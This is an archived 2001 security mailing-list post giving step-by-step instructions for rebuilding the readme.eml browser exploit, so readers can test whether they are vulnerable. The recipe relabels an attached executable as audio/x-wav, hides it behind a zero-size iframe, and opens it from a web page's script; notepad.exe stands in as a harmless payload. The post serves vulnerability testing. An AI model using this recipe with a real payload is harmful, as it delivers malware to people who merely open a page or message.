test for browser vulnerability

From: oncemyway (oncemyway@computers-mn.com)
Date: 09/18/01


From: "oncemyway" <oncemyway@computers-mn.com>
To: <incidents@securityfocus.com>, <bugtraq@securityfocus.com>
Subject: test for browser vulnerability
Date: Tue, 18 Sep 2001 15:17:38 -0500
Message-ID: <000101c1407e$f6cd6f40$be2b87a8@I23T78R1>

Hello-

I became concerned with this after I read someone had actually executed the
code by visiting a web site. (my servers are patched, so I'm not worried
about that)

I have duplicated the readme.eml message, only using notepad.exe instead.

If I use an actual .wav file, readme.eml is opened from the web page and the
wav file opens and plays in media player. If I use notepad.exe
(Content-Type: audio/x-wav), I am prompted as to whether I would like to
download or not. If I select run from current location, it runs notepad.
This is the behavior I would like, so no malicious code runs without me
knowing. However, I am using Media Player 6.4, so I don't know if it makes a
difference.

To create your own readme.eml to test if you are susceptible, follow these
steps:

1. Create a dummy message in OE. You don't have to address it to anyone.
2. Attache notepad.exe.
3. Save as readme.eml
4. Edit the readme.eml with notepad. Find the html body and replace with:

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

5. Find the notepad.exe attachment section. Change Content-Type to
audio/x-wav
6. (necessary?) Remove Content-Disposition:
attachment;filename="NOTEPAD.EXE" header.
7. Add the following header:

Content-ID: <EA4DMGBP9p>

This is apparently to link the iframe <src> tag.

8. Save the file.
9. Create a web page that includes the code:

<script language="JavaScript">
window.open("readme.eml", null, "resizable=yes,top=0,left=0")
</script>

make sure readme.eml is in the same directory.
10. Open the web page as see what happens. Like I said, I was prompted. I
hope you are too because this would be very serious if it could be spread
*that* easy.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • test for browser vulnerability
    ... If I use an actual .wav file, readme.eml is opened from the web page and the ... (Content-Type: audio/x-wav), I am prompted as to whether I would like to ... Attache notepad.exe. ... Add the following header: ...
    (Focus-Microsoft)
  • Re: Controlling Javascript from server side
    ... ECMAScript in Opera, KJS ECMAScript in Konqueror, and JavaScriptCore ... That would make the HTTP request invalid, as the header name "Content-Type" ...
    (comp.lang.javascript)
  • Re: How to set content-type header for ASP/HTML pages only ?
    ... The right way to do this association is with a MIME-Type (IIS can configure ... set the value of the Content-Type header on a per-extension basis. ... I would like to set the content-type HTTP header for Content-Type. ... Is there any way to set the Content-Type specific to file type? ...
    (microsoft.public.inetserver.iis)
  • Re: an effective script for grabbing and putting images from or to a website
    ... decisions about it based first on the extension, but what the html says ... what HTTP (Content-Type header) says about the image. ... the content-type he would need to make the request before choosing the ...
    (comp.lang.perl.misc)
  • Re: How to set content-type header for ASP/HTML pages only ?
    ... Character encoding, per the HTTP 1.1 spec on W3C, is a part of Content-Type ... you should configuration the MIME Map setting on IIS (it's right below ... >set the value of the Content-Type header on a per-extension basis. ...
    (microsoft.public.inetserver.iis)